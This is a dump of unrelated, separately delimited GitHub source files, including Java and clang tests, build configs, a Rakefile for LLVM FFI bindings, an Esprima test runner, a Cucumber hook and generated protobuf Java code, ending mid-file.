public void cyclic_document_dependencies_are_detected() throws ParseException {
SearchBuilder builder = new SearchBuilder();
String campaignSdContent =
"search campaign {\n" +
" document campaign {\n" +
" field ad_ref type reference<ad> { indexing: attribute }\n" +
" }\n" +
"}";
String adSdContent =
"search ad {\n" +
" document ad {\n" +
" field campaign_ref type reference<campaign> { indexing: attribute }\n" +
" }\n" +
"}";
builder.importString(campaignSdContent);
builder.importString(adSdContent);
exceptionRule.expect(DocumentGraphValidator.DocumentGraphException.class);
exceptionRule.expectMessage("Document dependency cycle detected: campaign->ad->campaign.");
builder.build();
}
private static void assertSearchContainsReferenceField(String expectedFieldname,
String referencedDocType,
SDDocumentType documentType) {
Field field = documentType.getDocumentType().getField(expectedFieldname);
assertNotNull("Field does not exist in document type: " + expectedFieldname, field);
DataType dataType = field.getDataType();
assertThat(dataType, instanceOf(ReferenceDataType.class));
ReferenceDataType refField = (ReferenceDataType) dataType;
assertEquals(referencedDocType, refField.getTargetType().getName());
}
}
| {
"pile_set_name": "Github"
} |
<?php
declare(strict_types=1); // @codeCoverageIgnore
use Evenement\EventEmitterInterface;
use Peridot\Console\Environment;
use Peridot\Reporter\CodeCoverage\AbstractCodeCoverageReporter;
use Peridot\Reporter\CodeCoverageReporters;
use Recoil\Dev\Peridot\Plugin;
use Recoil\ReferenceKernel\ReferenceKernel;
require __DIR__ . '/vendor/autoload.php';
return function (EventEmitterInterface $emitter) {
(new CodeCoverageReporters($emitter))->register();
Plugin::install($emitter, function () {
return ReferenceKernel::create();
});
$emitter->on('peridot.start', function (Environment $environment) {
$environment->getDefinition()->getArgument('path')->setDefault('test/suite');
});
$emitter->on('code-coverage.start', function (AbstractCodeCoverageReporter $reporter) {
$reporter->addDirectoryToWhitelist(__DIR__ . '/src');
});
};
| {
"pile_set_name": "Github"
} |
void test(bool x) {
if (x) {}
// RUN: %clang_cc1 -fsyntax-only -code-completion-at=%s:2:7 %s | FileCheck %s
// CHECK: PREFERRED-TYPE: _Bool
while (x) {}
// RUN: %clang_cc1 -fsyntax-only -code-completion-at=%s:6:10 %s | FileCheck %s
for (; x;) {}
// RUN: %clang_cc1 -fsyntax-only -code-completion-at=%s:9:10 %s | FileCheck %s
// FIXME(ibiryukov): the condition in do-while is parsed as expression, so we
// fail to detect it should be converted to bool.
// do {} while (x);
}
| {
"pile_set_name": "Github"
} |
Alex Chapman
Daniel Ehrenberg
| {
"pile_set_name": "Github"
} |
<ResourceDictionary
xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"
xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"
xmlns:Controls="clr-namespace:System.Windows.Controls">
<Style TargetType="{x:Type Controls:EditTextBox}">
<Setter Property="Foreground" Value="{DynamicResource {x:Static SystemColors.ControlTextBrushKey}}"/>
<Setter Property="Background" Value="{DynamicResource {x:Static SystemColors.WindowBrushKey}}"/>
<Setter Property="BorderBrush" Value="Black"/>
<Setter Property="BorderThickness" Value="0"/>
<Setter Property="Padding" Value="1"/>
<Setter Property="AllowDrop" Value="true"/>
<Setter Property="FocusVisualStyle" Value="{x:Null}"/>
<Setter Property="VerticalContentAlignment" Value="Center"/>
<Setter Property="Template">
<Setter.Value>
<ControlTemplate TargetType="{x:Type TextBox}">
<Border
Name="Bd"
SnapsToDevicePixels="true"
Background="{TemplateBinding Background}"
BorderBrush="{TemplateBinding BorderBrush}"
BorderThickness="{TemplateBinding BorderThickness}">
<ScrollViewer
Name="PART_ContentHost"
SnapsToDevicePixels="{TemplateBinding SnapsToDevicePixels}"
VerticalAlignment="Top"/>
</Border>
<ControlTemplate.Triggers>
<Trigger Property="IsEnabled" Value="false">
<Setter Property="Background" TargetName="Bd" Value="{DynamicResource {x:Static SystemColors.ControlBrushKey}}"/>
<Setter Property="Foreground" Value="{DynamicResource {x:Static SystemColors.GrayTextBrushKey}}"/>
</Trigger>
</ControlTemplate.Triggers>
</ControlTemplate>
</Setter.Value>
</Setter>
</Style>
</ResourceDictionary> | {
"pile_set_name": "Github"
} |
require 'bundler/setup'
require 'bundler/gem_tasks'
require 'rake/testtask'
require 'yard'
require 'llvm/version'
require 'llvm/config'
YARD::Rake::YardocTask.new do |t|
yardlib = File.join(File.dirname(__FILE__), "yardlib/llvm.rb")
t.options = %W[-e #{yardlib} --no-private]
t.files = Dir['lib/**/*.rb']
end
Rake::TestTask.new do |t|
t.libs = %w(test)
t.test_files = FileList["test/**/*_test.rb"]
end
desc 'Regenerate FFI bindings'
task :generate_ffi do
require 'ffi_gen'
mappings = {
# Core
'core_ffi.rb' => %w(Support.h Core.h),
'core/bitcode_ffi.rb' => %w(BitReader.h BitWriter.h),
# Transformations
'analysis_ffi.rb' => %w(Analysis.h),
'transforms/ipo_ffi.rb' => %w(Transforms/IPO.h),
'transforms/scalar_ffi.rb' => %w(Transforms/Scalar.h),
'transforms/vectorize_ffi.rb' => %w(Transforms/Vectorize.h),
'transforms/builder_ffi.rb' => %w(Transforms/PassManagerBuilder.h),
# Code generation
'target_ffi.rb' => %w(Target.h TargetMachine.h),
'linker_ffi.rb' => %w(Linker.h),
'execution_engine_ffi.rb' => %w(ExecutionEngine.h),
}
mappings.each do |ruby_file, headers|
FFIGen.generate(
module_name: 'LLVM::C',
ffi_lib: ["libLLVM-#{LLVM::LLVM_VERSION}.so.1",
"LLVM-#{LLVM::LLVM_VERSION}"],
headers: headers.map { |header| "llvm-c/#{header}" },
cflags: LLVM::CONFIG::CFLAGS.split(/\s/),
prefixes: %w(LLVM),
output: "lib/llvm/#{ruby_file}"
)
end
end
task :default => [:test]
| {
"pile_set_name": "Github"
} |
package com.shreyaspatil.MaterialNavigationDrawer.example.ui.home
import android.os.Bundle
import android.view.LayoutInflater
import android.view.View
import android.view.ViewGroup
import android.widget.TextView
import androidx.fragment.app.Fragment
import androidx.lifecycle.Observer
import androidx.lifecycle.ViewModelProviders
import com.shreyaspatil.MaterialNavigationDrawer.example.R
class HomeFragment : Fragment() {
private lateinit var homeViewModel: HomeViewModel
override fun onCreateView(
inflater: LayoutInflater,
container: ViewGroup?,
savedInstanceState: Bundle?
): View? {
homeViewModel =
ViewModelProviders.of(this).get(HomeViewModel::class.java)
val root = inflater.inflate(R.layout.fragment_home, container, false)
val textView: TextView = root.findViewById(R.id.text_home)
homeViewModel.text.observe(this, Observer {
textView.text = it
})
return root
}
} | {
"pile_set_name": "Github"
} |
# This file is used by the build system to adjust CSS and JS output to support the specified browsers below.
# For additional information regarding the format and rule options, please see:
# https://github.com/browserslist/browserslist#queries
# You can see what browsers were selected by your queries by running:
# npx browserslist
> 0.5%
last 2 versions
Firefox ESR
not dead
IE 9-11 | {
"pile_set_name": "Github"
} |
interface I {}
@:cs.using("System")
class Main2 {
public static function main():Void {
trace('ko');
}
}
| {
"pile_set_name": "Github"
} |
#include <unittest/runtime_static_assert.h>
#include <unittest/unittest.h>
#include <thrust/generate.h>
template<typename T>
struct dependent_false
{
enum { value = false };
};
template<typename T>
struct static_assertion
{
__host__ __device__
int operator()() const
{
THRUST_STATIC_ASSERT(dependent_false<T>::value);
return 0;
}
};
template<typename V>
void TestStaticAssertAssert()
{
#if THRUST_DEVICE_SYSTEM != THRUST_DEVICE_SYSTEM_OMP && THRUST_HOST_SYSTEM != THRUST_HOST_SYSTEM_OMP
V test(10);
ASSERT_STATIC_ASSERT(thrust::generate(test.begin(), test.end(), static_assertion<int>()));
#endif
}
DECLARE_VECTOR_UNITTEST(TestStaticAssertAssert);
| {
"pile_set_name": "Github"
} |
.. TorchSat documentation master file, created by
sphinx-quickstart on Sat Sep 14 10:56:23 2019.
You can adapt this file completely to your liking, but it should at least
contain the root `toctree` directive.
Welcome to TorchSat's documentation!
====================================
TorchSat is an open-source deep learning framework for satellite imagery analysis based on PyTorch_.
This project is still **work in progress**. If you want to know more about it, please refer to the Roadmap_ .
**Hightlight**
- Support multi-channels(> 3 channels, e.g. 8 channels) images and TIFF file as input.
- Convenient data augmentation method for classification, sementic segmentation and object detection.
- Lots of models for satellite vision tasks, such as ResNet, DenseNet, UNet, PSPNet, SSD, FasterRCNN ...
- Lots of common satellite datasets loader.
- Training script for common satellite vision tasks.
.. toctree::
:maxdepth: 2
:caption: Contents:
installation.md
core-conception.md
tutorials/image-classification.md
tutorials/semantic-segmentation.md
tutorials/object-detection.md
tutorials/change-detection.md
tutorials/data-augumentation.md
tools.md
api/api.rst
Indices and tables
==================
* :ref:`genindex`
* :ref:`modindex`
* :ref:`search`
.. _Roadmap: https://github.com/sshuair/torchsat/wiki/Roadmap
.. _PyTorch: https://pytorch.org/
| {
"pile_set_name": "Github"
} |
/*
Copyright (C) 2012 Joost-Wim Boekesteijn <[email protected]>
Copyright (C) 2011 Ariya Hidayat <[email protected]>
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
ARE DISCLAIMED. IN NO EVENT SHALL <COPYRIGHT HOLDER> BE LIABLE FOR ANY
DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
/*jslint node: true */
/*global document: true, window:true, esprima: true, testReflect: true */
var runTests;
function getContext(esprima, reportCase, reportFailure) {
'use strict';
var Reflect, Pattern;
// Maps Mozilla Reflect object to our Esprima parser.
Reflect = {
parse: function (code) {
var result;
reportCase(code);
try {
result = esprima.parse(code);
} catch (error) {
result = error;
}
return result;
}
};
// This is used by Reflect test suite to match a syntax tree.
Pattern = function (obj) {
var pattern;
// Poor man's deep object cloning.
pattern = JSON.parse(JSON.stringify(obj));
// Special handling for regular expression literal since we need to
// convert it to a string literal, otherwise it will be decoded
// as object "{}" and the regular expression would be lost.
if (obj.type && obj.type === 'Literal') {
if (obj.value instanceof RegExp) {
pattern = {
type: obj.type,
value: obj.value.toString()
};
}
}
// Special handling for branch statement because SpiderMonkey
// prefers to put the 'alternate' property before 'consequent'.
if (obj.type && obj.type === 'IfStatement') {
pattern = {
type: pattern.type,
test: pattern.test,
consequent: pattern.consequent,
alternate: pattern.alternate
};
}
// Special handling for do while statement because SpiderMonkey
// prefers to put the 'test' property before 'body'.
if (obj.type && obj.type === 'DoWhileStatement') {
pattern = {
type: pattern.type,
body: pattern.body,
test: pattern.test
};
}
function adjustRegexLiteralAndRaw(key, value) {
if (key === 'value' && value instanceof RegExp) {
value = value.toString();
} else if (key === 'raw' && typeof value === "string") {
// Ignore Esprima-specific 'raw' property.
return undefined;
}
return value;
}
if (obj.type && (obj.type === 'Program')) {
pattern.assert = function (tree) {
var actual, expected;
actual = JSON.stringify(tree, adjustRegexLiteralAndRaw, 4);
expected = JSON.stringify(obj, null, 4);
if (expected !== actual) {
reportFailure(expected, actual);
}
};
}
return pattern;
};
return {
Reflect: Reflect,
Pattern: Pattern
};
}
if (typeof window !== 'undefined') {
// Run all tests in a browser environment.
runTests = function () {
'use strict';
var total = 0,
failures = 0;
function setText(el, str) {
if (typeof el.innerText === 'string') {
el.innerText = str;
} else {
el.textContent = str;
}
}
function reportCase(code) {
var report, e;
report = document.getElementById('report');
e = document.createElement('pre');
e.setAttribute('class', 'code');
setText(e, code);
report.appendChild(e);
total += 1;
}
function reportFailure(expected, actual) {
var report, e;
failures += 1;
report = document.getElementById('report');
e = document.createElement('p');
setText(e, 'Expected');
report.appendChild(e);
e = document.createElement('pre');
e.setAttribute('class', 'expected');
setText(e, expected);
report.appendChild(e);
e = document.createElement('p');
setText(e, 'Actual');
report.appendChild(e);
e = document.createElement('pre');
e.setAttribute('class', 'actual');
setText(e, actual);
report.appendChild(e);
}
setText(document.getElementById('version'), esprima.version);
window.setTimeout(function () {
var tick, context = getContext(esprima, reportCase, reportFailure);
tick = new Date();
testReflect(context.Reflect, context.Pattern);
tick = (new Date()) - tick;
if (failures > 0) {
document.getElementById('status').className = 'alert-box alert';
setText(document.getElementById('status'), total + ' tests. ' +
'Failures: ' + failures + '. ' + tick + ' ms');
} else {
document.getElementById('status').className = 'alert-box success';
setText(document.getElementById('status'), total + ' tests. ' +
'No failure. ' + tick + ' ms');
}
}, 11);
};
} else {
(function (global) {
'use strict';
var esprima = require('../esprima'),
tick,
total = 0,
failures = [],
header,
current,
context;
function reportCase(code) {
total += 1;
current = code;
}
function reportFailure(expected, actual) {
failures.push({
source: current,
expected: expected.toString(),
actual: actual.toString()
});
}
context = getContext(esprima, reportCase, reportFailure);
tick = new Date();
require('./reflect').testReflect(context.Reflect, context.Pattern);
tick = (new Date()) - tick;
header = total + ' tests. ' + failures.length + ' failures. ' +
tick + ' ms';
if (failures.length) {
console.error(header);
failures.forEach(function (failure) {
console.error(failure.source + ': Expected\n ' +
failure.expected.split('\n').join('\n ') +
'\nto match\n ' + failure.actual);
});
} else {
console.log(header);
}
process.exit(failures.length === 0 ? 0 : 1);
}(this));
}
/* vim: set sw=4 ts=4 et tw=80 : */
| {
"pile_set_name": "Github"
} |
# The first scenario that fails, we want to save and launch the page in the Browser.
# We don't want to to open subsequent failures, as that can be HIGHLY annoying when running from the command line.
#
# Also, this https://gist.github.com/398643
# has good info on how to save Assets/CSS so we can see the full version of the page.
#
module LaunchOnFirstFailure
class << self
attr_accessor :failed_tests
def failure_occurred
self.failed_tests = 0 unless failed_tests
self.failed_tests += 1
end
def failed_tests?
failed_tests && failed_tests >= 0
end
end
end
After('~@cli')do |scenario|
if scenario.failed? && !LaunchOnFirstFailure.failed_tests? && ENV['launch_on_failure'] != 'false'
LaunchOnFirstFailure.failure_occurred
save_and_open_page
end
end | {
"pile_set_name": "Github"
} |
// Generated by the protocol buffer compiler. DO NOT EDIT!
// source: DependencyTestProto.proto
package io.confluent.kafka.serializers.protobuf.test;
public final class DependencyTestProto {
private DependencyTestProto() {}
public static void registerAllExtensions(
com.google.protobuf.ExtensionRegistryLite registry) {
}
public static void registerAllExtensions(
com.google.protobuf.ExtensionRegistry registry) {
registerAllExtensions(
(com.google.protobuf.ExtensionRegistryLite) registry);
}
public interface DependencyMessageOrBuilder extends
// @@protoc_insertion_point(interface_extends:io.confluent.kafka.serializers.protobuf.test.DependencyMessage)
com.google.protobuf.MessageOrBuilder {
/**
* <code>.io.confluent.kafka.serializers.protobuf.test.NestedMessage nested_message = 1;</code>
* @return Whether the nestedMessage field is set.
*/
boolean hasNestedMessage();
/**
* <code>.io.confluent.kafka.serializers.protobuf.test.NestedMessage nested_message = 1;</code>
* @return The nestedMessage.
*/
io.confluent.kafka.serializers.protobuf.test.NestedTestProto.NestedMessage getNestedMessage();
/**
* <code>.io.confluent.kafka.serializers.protobuf.test.NestedMessage nested_message = 1;</code>
*/
io.confluent.kafka.serializers.protobuf.test.NestedTestProto.NestedMessageOrBuilder getNestedMessageOrBuilder();
/**
* <code>bool is_active = 2;</code>
* @return The isActive.
*/
boolean getIsActive();
/**
* <code>.io.confluent.kafka.serializers.protobuf.test.TestMessage test_messsage = 3;</code>
* @return Whether the testMesssage field is set.
*/
boolean hasTestMesssage();
/**
* <code>.io.confluent.kafka.serializers.protobuf.test.TestMessage test_messsage = 3;</code>
* @return The testMesssage.
*/
io.confluent.kafka.serializers.protobuf.test.TestMessageProtos.TestMessage getTestMesssage();
/**
* <code>.io.confluent.kafka.serializers.protobuf.test.TestMessage test_messsage = 3;</code>
*/
io.confluent.kafka.serializers.protobuf.test.TestMessageProtos.TestMessageOrBuilder getTestMesssageOrBuilder();
}
/**
* Protobuf type {@code io.confluent.kafka.serializers.protobuf.test.DependencyMessage}
*/
public static final class DependencyMessage extends
com.google.protobuf.GeneratedMessageV3 implements
// @@protoc_insertion_point(message_implements:io.confluent.kafka.serializers.protobuf.test.DependencyMessage)
DependencyMessageOrBuilder {
private static final long serialVersionUID = 0L;
// Use DependencyMessage.newBuilder() to construct.
private DependencyMessage(com.google.protobuf.GeneratedMessageV3.Builder<?> builder) {
super(builder);
}
private DependencyMessage() {
}
@java.lang.Override
@SuppressWarnings({"unused"})
protected java.lang.Object newInstance(
UnusedPrivateParameter unused) {
return new DependencyMessage();
}
@java.lang.Override
public final com.google.protobuf.UnknownFieldSet
getUnknownFields() {
return this.unknownFields;
}
private DependencyMessage(
com.google.protobuf.CodedInputStream input,
com.google.protobuf.ExtensionRegistryLite extensionRegistry)
throws com.google.protobuf.InvalidProtocolBufferException {
this();
if (extensionRegistry == null) {
throw new java.lang.NullPointerException();
}
com.google.protobuf.UnknownFieldSet.Builder unknownFields =
com.google.protobuf.UnknownFieldSet.newBuilder();
try {
boolean done = false;
while (!done) {
int tag = input.readTag();
switch (tag) {
case 0:
done = true;
break;
case 10: {
io.confluent.kafka.serializers.protobuf.test.NestedTestProto.NestedMessage.Builder subBuilder = null;
if (nestedMessage_ != null) {
subBuilder = nestedMessage_.toBuilder();
}
nestedMessage_ = input.readMessage(io.confluent.kafka.serializers.protobuf.test.NestedTestProto.NestedMessage.parser(), extensionRegistry);
if (subBuilder != null) {
subBuilder.mergeFrom(nestedMessage_);
nestedMessage_ = subBuilder.buildPartial();
}
break;
}
case 16: {
isActive_ = input.readBool();
break;
}
case 26: {
io.confluent.kafka.serializers.protobuf.test.TestMessageProtos.TestMessage.Builder subBuilder = null;
if (testMesssage_ != null) {
subBuilder = testMesssage_.toBuilder();
}
testMesssage_ = input.readMessage(io.confluent.kafka.serializers.protobuf.test.TestMessageProtos.TestMessage.parser(), extensionRegistry);
if (subBuilder != null) {
subBuilder.mergeFrom(testMesssage_);
testMesssage_ = subBuilder.buildPartial();
}
break;
}
default: {
if (!parseUnknownField(
input, unknownFields, extensionRegistry, tag)) {
done = true;
}
break;
}
}
}
} catch (com.google.protobuf.InvalidProtocolBufferException e) {
throw e.setUnfinishedMessage(this);
} catch (java.io.IOException e) {
throw new com.google.protobuf.InvalidProtocolBufferException(
e).setUnfinishedMessage(this);
} finally {
this.unknownFields = unknownFields.build();
makeExtensionsImmutable();
}
}
public static final com.google.protobuf.Descriptors.Descriptor
getDescriptor() {
return io.confluent.kafka.serializers.protobuf.test.DependencyTestProto.internal_static_io_confluent_kafka_serializers_protobuf_test_DependencyMessage_descriptor;
}
@java.lang.Override
protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable
internalGetFieldAccessorTable() {
return io.confluent.kafka.serializers.protobuf.test.DependencyTestProto.internal_static_io_confluent_kafka_serializers_protobuf_test_DependencyMessage_fieldAccessorTable
.ensureFieldAccessorsInitialized(
io.confluent.kafka.serializers.protobuf.test.DependencyTestProto.DependencyMessage.class, io.confluent.kafka.serializers.protobuf.test.DependencyTestProto.DependencyMessage.Builder.class);
}
public static final int NESTED_MESSAGE_FIELD_NUMBER = 1;
private io.confluent.kafka.serializers.protobuf.test.NestedTestProto.NestedMessage nestedMessage_;
/**
* <code>.io.confluent.kafka.serializers.protobuf.test.NestedMessage nested_message = 1;</code>
* @return Whether the nestedMessage field is set.
*/
public boolean hasNestedMessage() {
return nestedMessage_ != null;
}
/**
* <code>.io.confluent.kafka.serializers.protobuf.test.NestedMessage nested_message = 1;</code>
* @return The nestedMessage.
*/
public io.confluent.kafka.serializers.protobuf.test.NestedTestProto.NestedMessage getNestedMessage() {
return nestedMessage_ == null ? io.confluent.kafka.serializers.protobuf.test.NestedTestProto.NestedMessage.getDefaultInstance() : nestedMessage_;
}
/**
* <code>.io.confluent.kafka.serializers.protobuf.test.NestedMessage nested_message = 1;</code>
*/
public io.confluent.kafka.serializers.protobuf.test.NestedTestProto.NestedMessageOrBuilder getNestedMessageOrBuilder() {
return getNestedMessage();
}
public static final int IS_ACTIVE_FIELD_NUMBER = 2;
private boolean isActive_;
/**
* <code>bool is_active = 2;</code>
* @return The isActive.
*/
public boolean getIsActive() {
return isActive_;
}
public static final int TEST_MESSSAGE_FIELD_NUMBER = 3;
private io.confluent.kafka.serializers.protobuf.test.TestMessageProtos.TestMessage testMesssage_;
/**
* <code>.io.confluent.kafka.serializers.protobuf.test.TestMessage test_messsage = 3;</code>
* @return Whether the testMesssage field is set.
*/
public boolean hasTestMesssage() {
return testMesssage_ != null;
}
/**
* <code>.io.confluent.kafka.serializers.protobuf.test.TestMessage test_messsage = 3;</code>
* @return The testMesssage.
*/
public io.confluent.kafka.serializers.protobuf.test.TestMessageProtos.TestMessage getTestMesssage() {
return testMesssage_ == null ? io.confluent.kafka.serializers.protobuf.test.TestMessageProtos.TestMessage.getDefaultInstance() : testMesssage_;
}
/**
* <code>.io.confluent.kafka.serializers.protobuf.test.TestMessage test_messsage = 3;</code>
*/
public io.confluent.kafka.serializers.protobuf.test.TestMessageProtos.TestMessageOrBuilder getTestMesssageOrBuilder() {
return getTestMesssage();
}
private byte memoizedIsInitialized = -1;
@java.lang.Override
public final boolean isInitialized() {
byte isInitialized = memoizedIsInitialized;
if (isInitialized == 1) return true;
if (isInitialized == 0) return false;
memoizedIsInitialized = 1;
return true;
}
@java.lang.Override
public void writeTo(com.google.protobuf.CodedOutputStream output)
throws java.io.IOException {
if (nestedMessage_ != null) {
output.writeMessage(1, getNestedMessage());
}
if (isActive_ != false) {
output.writeBool(2, isActive_);
}
if (testMesssage_ != null) {
output.writeMessage(3, getTestMesssage());
}
unknownFields.writeTo(output);
}
@java.lang.Override
public int getSerializedSize() {
int size = memoizedSize;
if (size != -1) return size;
size = 0;
if (nestedMessage_ != null) {
size += com.google.protobuf.CodedOutputStream
.computeMessageSize(1, getNestedMessage());
}
if (isActive_ != false) {
size += com.google.protobuf.CodedOutputStream
.computeBoolSize(2, isActive_);
}
if (testMesssage_ != null) {
size += com.google.protobuf.CodedOutputStream
.computeMessageSize(3, getTestMesssage());
}
size += unknownFields.getSerializedSize();
memoizedSize = size;
return size;
}
@java.lang.Override
public boolean equals(final java.lang.Object obj) {
if (obj == this) {
return true;
}
if (!(obj instanceof io.confluent.kafka.serializers.protobuf.test.DependencyTestProto.DependencyMessage)) {
return super.equals(obj);
}
io.confluent.kafka.serializers.protobuf.test.DependencyTestProto.DependencyMessage other = (io.confluent.kafka.serializers.protobuf.test.DependencyTestProto.DependencyMessage) obj;
if (hasNestedMessage() != other.hasNestedMessage()) return false;
if (hasNestedMessage()) {
if (!getNestedMessage()
.equals(other.getNestedMessage())) return false;
}
if (getIsActive()
!= other.getIsActive()) return false;
if (hasTestMesssage() != other.hasTestMesssage()) return false;
if (hasTestMesssage()) {
if (!getTestMesssage()
.equals(other.getTestMesssage())) return false;
}
if (!unknownFields.equals(other.unknownFields)) return false;
return true;
}
@java.lang.Override
public int hashCode() {
if (memoizedHashCode != 0) {
return memoizedHashCode;
}
int hash = 41;
hash = (19 * hash) + getDescriptor().hashCode();
if (hasNestedMessage()) {
hash = (37 * hash) + NESTED_MESSAGE_FIELD_NUMBER;
hash = (53 * hash) + getNestedMessage().hashCode();
}
hash = (37 * hash) + IS_ACTIVE_FIELD_NUMBER;
hash = (53 * hash) + com.google.protobuf.Internal.hashBoolean(
getIsActive());
if (hasTestMesssage()) {
hash = (37 * hash) + TEST_MESSSAGE_FIELD_NUMBER;
hash = (53 * hash) + getTestMesssage().hashCode();
}
hash = (29 * hash) + unknownFields.hashCode();
memoizedHashCode = hash;
return hash;
}
public static io.confluent.kafka.serializers.protobuf.test.DependencyTestProto.DependencyMessage parseFrom(
java.nio.ByteBuffer data)
throws com.google.protobuf.InvalidProtocolBufferException {
return PARSER.parseFrom(data);
}
public static io.confluent.kafka.serializers.protobuf.test.DependencyTestProto.DependencyMessage parseFrom(
java.nio.ByteBuffer data,
com.google.protobuf.ExtensionRegistryLite extensionRegistry)
throws com.google.protobuf.InvalidProtocolBufferException {
return PARSER.parseFrom(data, extensionRegistry);
}
public static io.confluent.kafka.serializers.protobuf.test.DependencyTestProto.DependencyMessage parseFrom(
com.google.protobuf.ByteString data)
throws com.google.protobuf.InvalidProtocolBufferException {
return PARSER.parseFrom(data);
}
public static io.confluent.kafka.serializers.protobuf.test.DependencyTestProto.DependencyMessage parseFrom(
com.google.protobuf.ByteString data,
com.google.protobuf.ExtensionRegistryLite extensionRegistry)
throws com.google.protobuf.InvalidProtocolBufferException {
return PARSER.parseFrom(data, extensionRegistry);
}
public static io.confluent.kafka.serializers.protobuf.test.DependencyTestProto.DependencyMessage parseFrom(byte[] data)
throws com.google.protobuf.InvalidProtocolBufferException {
return PARSER.parseFrom(data);
}
public static io.confluent.kafka.serializers.protobuf.test.DependencyTestProto.DependencyMessage parseFrom(
byte[] data,
com.google.protobuf.ExtensionRegistryLite extensionRegistry)
throws com.google.protobuf.InvalidProtocolBufferException {
return PARSER.parseFrom(data, extensionRegistry);
}
public static io.confluent.kafka.serializers.protobuf.test.DependencyTestProto.DependencyMessage parseFrom(java.io.InputStream input)
throws java.io.IOException {
return com.google.protobuf.GeneratedMessageV3
.parseWithIOException(PARSER, input);
}
public static io.confluent.kafka.serializers.protobuf.test.DependencyTestProto.DependencyMessage parseFrom(
java.io.InputStream input,
com.google.protobuf.ExtensionRegistryLite extensionRegistry)
throws java.io.IOException {
return com.google.protobuf.GeneratedMessageV3
.parseWithIOException(PARSER, input, extensionRegistry);
}
public static io.confluent.kafka.serializers.protobuf.test.DependencyTestProto.DependencyMessage parseDelimitedFrom(java.io.InputStream input)
throws java.io.IOException {
return com.google.protobuf.GeneratedMessageV3
.parseDelimitedWithIOException(PARSER, input);
}
public static io.confluent.kafka.serializers.protobuf.test.DependencyTestProto.DependencyMessage parseDelimitedFrom(
java.io.InputStream input,
com.google.protobuf.ExtensionRegistryLite extensionRegistry)
throws java.io.IOException {
return com.google.protobuf.GeneratedMessageV3
.parseDelimitedWithIOException(PARSER, input, extensionRegistry);
}
public static io.confluent.kafka.serializers.protobuf.test.DependencyTestProto.DependencyMessage parseFrom(
com.google.protobuf.CodedInputStream input)
throws java.io.IOException {
return com.google.protobuf.GeneratedMessageV3
.parseWithIOException(PARSER, input);
}
public static io.confluent.kafka.serializers.protobuf.test.DependencyTestProto.DependencyMessage parseFrom(
com.google.protobuf.CodedInputStream input,
com.google.protobuf.ExtensionRegistryLite extensionRegistry)
throws java.io.IOException {
return com.google.protobuf.GeneratedMessageV3
.parseWithIOException(PARSER, input, extensionRegistry);
}
@java.lang.Override
public Builder newBuilderForType() { return newBuilder(); }
public static Builder newBuilder() {
return DEFAULT_INSTANCE.toBuilder();
}
public static Builder newBuilder(io.confluent.kafka.serializers.protobuf.test.DependencyTestProto.DependencyMessage prototype) {
return DEFAULT_INSTANCE.toBuilder().mergeFrom(prototype);
}
@java.lang.Override
public Builder toBuilder() {
return this == DEFAULT_INSTANCE
? new Builder() : new Builder().mergeFrom(this);
}
@java.lang.Override
protected Builder newBuilderForType(
com.google.protobuf.GeneratedMessageV3.BuilderParent parent) {
Builder builder = new Builder(parent);
return builder;
}
/**
* Protobuf type {@code io.confluent.kafka.serializers.protobuf.test.DependencyMessage}
*/
public static final class Builder extends
com.google.protobuf.GeneratedMessageV3.Builder<Builder> implements
// @@protoc_insertion_point(builder_implements:io.confluent.kafka.serializers.protobuf.test.DependencyMessage)
io.confluent.kafka.serializers.protobuf.test.DependencyTestProto.DependencyMessageOrBuilder {
public static final com.google.protobuf.Descriptors.Descriptor
getDescriptor() {
return io.confluent.kafka.serializers.protobuf.test.DependencyTestProto.internal_static_io_confluent_kafka_serializers_protobuf_test_DependencyMessage_descriptor;
}
@java.lang.Override
protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable
internalGetFieldAccessorTable() {
return io.confluent.kafka.serializers.protobuf.test.DependencyTestProto.internal_static_io_confluent_kafka_serializers_protobuf_test_DependencyMessage_fieldAccessorTable
.ensureFieldAccessorsInitialized(
io.confluent.kafka.serializers.protobuf.test.DependencyTestProto.DependencyMessage.class, io.confluent.kafka.serializers.protobuf.test.DependencyTestProto.DependencyMessage.Builder.class);
}
// Construct using io.confluent.kafka.serializers.protobuf.test.DependencyTestProto.DependencyMessage.newBuilder()
private Builder() {
maybeForceBuilderInitialization();
}
private Builder(
com.google.protobuf.GeneratedMessageV3.BuilderParent parent) {
super(parent);
maybeForceBuilderInitialization();
}
private void maybeForceBuilderInitialization() {
if (com.google.protobuf.GeneratedMessageV3
.alwaysUseFieldBuilders) {
}
}
@java.lang.Override
public Builder clear() {
super.clear();
if (nestedMessageBuilder_ == null) {
nestedMessage_ = null;
} else {
nestedMessage_ = null;
nestedMessageBuilder_ = null;
}
isActive_ = false;
if (testMesssageBuilder_ == null) {
testMesssage_ = null;
} else {
testMesssage_ = null;
testMesssageBuilder_ = null;
}
return this;
}
@java.lang.Override
public com.google.protobuf.Descriptors.Descriptor
getDescriptorForType() {
return io.confluent.kafka.serializers.protobuf.test.DependencyTestProto.internal_static_io_confluent_kafka_serializers_protobuf_test_DependencyMessage_descriptor;
}
@java.lang.Override
public io.confluent.kafka.serializers.protobuf.test.DependencyTestProto.DependencyMessage getDefaultInstanceForType() {
